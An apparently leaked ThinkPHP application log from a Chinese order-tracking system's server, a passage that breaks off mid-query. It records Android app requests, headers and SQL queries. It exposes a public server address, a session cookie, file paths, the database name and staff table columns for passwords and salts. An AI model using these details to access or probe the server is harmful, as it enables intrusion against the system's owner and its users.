( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001683s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000134s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:24+08:00 ] 106.112.205.110 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.026806s][吞吐率:37.31req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001069s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001517s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000088s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:24+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021338s][吞吐率:46.86req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001615s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:24+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021250s][吞吐率:47.06req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001184s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:25+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018377s][吞吐率:54.42req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001052s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:25+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.023208s][吞吐率:43.09req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000066s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001379s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:25+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020893s][吞吐率:47.86req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001128s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:25+08:00 ] 106.112.205.110 POST /api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=4&pageNum=10 [ info ] 47.105.33.115:8081/api/office/officeorder/getorderlist?userId=100&keywords=&shenhe=1&offset=4&pageNum=10 [运行时间:0.062449s][吞吐率:16.01req/s] [内存消耗:4,911.15kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000049s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001234s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getorderlist', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', 'keywords' => '', 'shenhe' => '1', 'offset' => '4', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001675s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getorderlist[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000549s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001552s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000375s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001508s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.001459s ] [ sql ] [ SQL ] SELECT `orderinfo`.`id`,`orderinfo`.`nei_number`,`orderinfo`.`number`,`orderinfo`.`pid`,`orderinfo`.`order_company`,`orderinfo`.`order_connect`,`orderinfo`.`order_phone`,`orderinfo`.`kehu_id`,`orderinfo`.`price`,`orderinfo`.`material_id`,`orderinfo`.`pProductinfo_id`,`orderinfo`.`productinfo_id`,`orderinfo`.`order_type`,`orderinfo`.`order_status`,`orderinfo`.`all_order_status`,`orderinfo`.`shengchan_status`,`orderinfo`.`zuixinshuoming`,`orderinfo`.`guzhangshu`,`orderinfo`.`zuixinguzhang`,`orderinfo`.`techprocess_id`,`orderinfo`.`actual_amount`,`orderinfo`.`kucun_amount`,`orderinfo`.`produce_amount`,`orderinfo`.`produced_amount`,`orderinfo`.`waste_amount`,`orderinfo`.`produced_time`,`orderinfo`.`send_amount`,`orderinfo`.`ruku_posi`,`orderinfo`.`sent_amount`,`orderinfo`.`out_time`,`orderinfo`.`build_order_staffid`,`orderinfo`.`factorymge_id`,`orderinfo`.`admin_id`,`orderinfo`.`remind_day`,`orderinfo`.`build_time`,`orderinfo`.`end_time`,`orderinfo`.`responsible_staffinfos`,`orderinfo`.`responsible_staffinfovars`,`orderinfo`.`feedback`,`orderinfo`.`guoqitime`,`orderinfo`.`guoqi_status`,`orderinfo`.`put_position`,`orderinfo`.`createtime`,`orderinfo`.`updatetime`,`orderinfo`.`is_modify`,`orderinfo`.`purchaseorder_id`,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime FROM `ot_orderinfo` `orderinfo` LEFT JOIN `ot_productinfo` `productinfo` ON `orderinfo`.`productinfo_id`=`productinfo`.`id` WHERE `orderinfo`.`factorymge_id` = 40 AND `orderinfo`.`pid` = 0 AND ( 1=1 ) AND ( order_status in ("1","2") or ( order_status = "3" and kehu_id != 0) ) ORDER BY 1658308465>orderinfo.end_time desc,1658308465>orderinfo.end_time desc,1658308465-orderinfo.end_time + orderinfo.remind_day * 24*60*60 desc, orderinfo.updatetime desc LIMIT 40,10 [ RunTime:0.002481s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_material` [ RunTime:0.001403s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000494s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000397s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000271s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000263s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000256s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000347s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000361s ] [ sql ] [ SQL ] SELECT * FROM `ot_material` WHERE `id` = 0 LIMIT 1 [ RunTime:0.000330s ] --------------------------------------------------------------- [ 2022-07-20T17:14:26+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021131s][吞吐率:47.32req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000060s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001051s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:26+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020346s][吞吐率:49.15req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001440s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:26+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018479s][吞吐率:54.12req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001063s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:26+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019889s][吞吐率:50.28req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001094s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:27+08:00 ] 106.112.205.110 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020111s][吞吐率:49.72req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001093s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; DVC-AN20 Build/HUAWEIDVC-AN20)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:14:29+08:00 ] 106.112.205.110 POST /api/users/getCaigouStaffs?userId=100 [ info ] 47.105.33.115:8081/api/users/getCaigouStaffs?userId=100 [运行时间:0.043691s][吞吐率:22.89req/s] [内存消耗:4,476.49kb] [文件加载:74] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000047s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001292s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'getCaigouStaffs', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '100', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001835s ] [ info ] [ RUN ] app\api\controller\Users->getCaigouStaffs[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000401s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001542s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001118s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '100' LIMIT 1 [ RunTime:0.000428s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `factorymge_id` = 40 AND `jobmge_id` = 8 [ RunTime:0.000396s ] --------------------------------------------------------------- [ 2022-07-20T17:14:29+08:00 ] 106.112.205.110 POST /api/users/getStaffs?staff_id=100 [ info ] 47.105.33.115:8081/api/users/getStaffs?staff_id=100 [运行时间:0.043953s][吞吐率:22.75req/s] [内存消耗:4,301.23kb] [文件加载:70] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001282s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'users', 2 => 'getStaffs', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '100', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001766s ] [ info ] [ RUN ] app\api\controller\Users->getStaffs[ /alidata/www/gendan/application/api/controller/Users.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000514s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001472s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 100 LIMIT 1 [ RunTime:0.000546s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `factorymge_id` = 40 AND `staff_status` = '1' AND ( jobmge_id in (2) ) [ RunTime:0.000527s ] --------------------------------------------------------------- [ 2022-07-20T17:14:30+08:00 ] 106.112.205.110 POST /api/kehu/getkehubykeyword?staff_id=100&keyword=&offset=0&pageNum=15 [ info ] 47.105.33.115:8081/api/kehu/getkehubykeyword?staff_id=100&keyword=&offset=0&pageNum=15 [运行时间:0.045166s][吞吐率:22.14req/s] [内存消耗:4,570.65kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001192s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kehu', 2 => 'getkehubykeyword', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '100', 'keyword' => '', 'offset' => '0', 'pageNum' => '15', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001872s ] [ info ] [ RUN ] app\api\controller\Kehu->getkehubykeyword[ /alidata/www/gendan/application/api/controller/Kehu.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000523s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001429s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001083s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '100' LIMIT 1 [ RunTime:0.000477s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001136s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `factorymge_id` = 40 AND `normalstatus` = '1' AND `name` LIKE '%%' ORDER BY `createtime` DESC LIMIT 0,15 [ RunTime:0.000458s ] --------------------------------------------------------------- [ 2022-07-20T17:14:33+08:00 ] 106.112.205.110 POST /api/kehu/getkehubykeyword?staff_id=100&keyword=&offset=0&pageNum=15 [ info ] 47.105.33.115:8081/api/kehu/getkehubykeyword?staff_id=100&keyword=&offset=0&pageNum=15 [运行时间:0.044617s][吞吐率:22.41req/s] [内存消耗:4,570.65kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001127s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kehu', 2 => 'getkehubykeyword', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=nce81t0u9kp1dno0b3r5stvcd0', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '100', 'keyword' => '', 'offset' => '0', 'pageNum' => '15', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001524s ] [ info ] [ RUN ] app\api\controller\Kehu->getkehubykeyword[ /alidata/www/gendan/application/api/controller/Kehu.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000556s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001485s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001034s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '100' LIMIT 1 [ RunTime:0.000544s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.001439s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `factorymge_id` = 40 AND `normalstatus` = '1' AND `name` 